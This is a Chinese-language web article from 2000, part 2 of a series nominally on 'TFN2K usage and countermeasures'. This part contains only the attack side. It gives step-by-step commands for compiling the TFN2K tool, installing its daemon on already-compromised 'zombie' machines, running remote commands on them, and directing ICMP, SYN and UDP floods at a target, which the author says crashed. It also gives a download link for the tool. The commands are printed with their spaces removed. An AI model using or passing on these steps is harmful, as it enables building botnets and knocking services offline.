tfn2k使用方法和对策(2)
发布时间:1970-01-01 作者:佚名 来源:互联网
tfn2k使用方法和对策(2)作者:佳佳佳佳继续上一次的文章,这一次是攻击测试。测试环境:共有5台机器,佳佳是在五台redhatlinux6.2上测试的。192.168.111.1192.168.111.2192.168.111.3
tfn2k使用方法和对策(2) 作者:佳佳 佳佳继续上一次的文章,这一次是攻击测试。 测试环境: 共有5台机器,佳佳是在五台redhatlinux6.2上测试的。 192.168.111.1 192.168.111.2 192.168.111.3 192.168.111.55 192.168.111.88 测试目的:?????(感受一下yahoo怎么被攻击的) 简要介绍: 我们的测试目的是用192.168.111.55指挥192.168.111.1,192.168.111.2,192.168.111.3 三台机器对192.168.111.88发动攻击。(实际攻击中就不止三台了。) 因此我们的步骤如下: 0。黑客攻击时事先要控制192.168.111.1,192.168.111.2,192.168.111.3,192.168.111.55这四台机器。也就是我们俗称的“肉鸡”。 1。编译代码。 2。在192.168.111.1,192.168.111.2,192.168.111.3上安装td。 3。在192.168.111.55安装tfn。 4。由192.168.111.55指挥192.168.111.1,192.168.111.2,192.168.111.3 对192.168.111.88发动攻击。 5。攻击结束。 详细步骤: 0。黑客攻击时事先要控制192.168.111.1,192.168.111.2,192.168.111.3,192.168.111.55这四台机器。 这一步我就不说了,大家一定有办法。。。 1。编译代码。 假设在192.168.112.55上。。。 首先一定要有root权限 $su # 解开文件: #tarzxvftfn2k.tgz #cdtfn2k 如果你不是linux或者bsd请修改src下的Makefile文件。(有一网友问佳佳,solaris为什么不行。如果你修改了Makefile,把linux改成了solaris仍然不行,佳佳也不知道了,因为佳佳没有solaris的测试环境。) #make make过程中会让你输入一个密码,8--32位的。那就输入一个吧,将来tfn和td联系时需要这个密码。我输入的是:aaaabbbb make完成你会发现,多了两个可执行文件:tfn,td 2。在192.168.111.1,192.168.111.2,192.168.111.3上安装td。 #ftp192.168.111.1 ftp>bin fpt>puttd ftp>by ftp的具体步骤我就不说了,大家一定都知道。 同样方法:ftp192.168.111.2 ftp192.168.111.3 然后在分别在192.168.111.1,192.168.111.2,192.168.111.3上 #./td 注意一定要有root权限,否则无法运行。 3。在192.168.111.55安装tfn。 由于我们是在192.168.111.55上编译的,tfn就已经在了。 4。由192.168.111.55指挥192.168.111.1,192.168.111.2,192.168.111.3对192.168.111.88发动攻击。 好了,我们终于完成了准备工作,攻击可以开始了。。。 我现在在192.168.111.55的/tfn2k/目录下。。。 我们需要编辑一个文件列表。 #vihosts.txt 文件第一行输入:192.168.111.1 文件第二行输入:192.168.111.2 文件第三行输入:192.168.111.3 这就是控制文件列表。 然后我们测试一下连接。 在192.168.111.55上。。。 下面的命令意思是:在hosts.txt文件中的机器上执行远程命令“mkdirjjgirl”,其中-c10表示执行远程命令。执行完这个命令就会在那三台机器上都建立jjgirl目录。当然你可以随便执行其他的命令。 #./tfn-fhosts.txt-c10-i"mkdirjjgirl" Protocol:random SourceIP:random Clientinput:list Command:executeremotecommand Passwordverification:(这时我们输入密码:aaaabbbb) Sendingoutpackets:. 好了,完成。 然后我们在192.168.111.1上执行: #find/-namejjgirl-print 好,找到了。说明我们连接成功。。。 下面开始正式攻击了。。。 你可以在192.168.111.1上: #./ntop 运行ntop查看流量。 先来ICMP攻击 #./tfn-fhosts.txt-c6-i192.168.111.88(十分钟,192.168.111.88就死机了) 重启,接着测试。。。 SYN/TCP攻击: #./tfn-fhosts.txt-c5-i192.168.111.88-p80 UDP攻击: #./tfn-fhosts.txt-c4-i192.168.111.88 ICMP/TCP/UDP轮流攻击: #./tfn-fhosts.txt-c8-i192.168.111.88 5。攻击结束 如果我们想停止攻击: #./tfn-fhost.txt-c0 实际tfn还有许多攻击选项,大家可以再回头看我的第一篇文章,看一下-c后面的11个选项。 整个测试结束。由于我是在局域网测试速度比较快。实际对yahoo等攻击时至少有几十台机器吧。 好了,下一篇文章主要分析tfn的源代码,有兴趣的同学接着等。。。 jjgirl10.29.2000 jjgirl@363.net http://jjgirl.yeah.net 下载地址: http://darknet.evilnerds.org/dos/ddos/tfn2k.tgz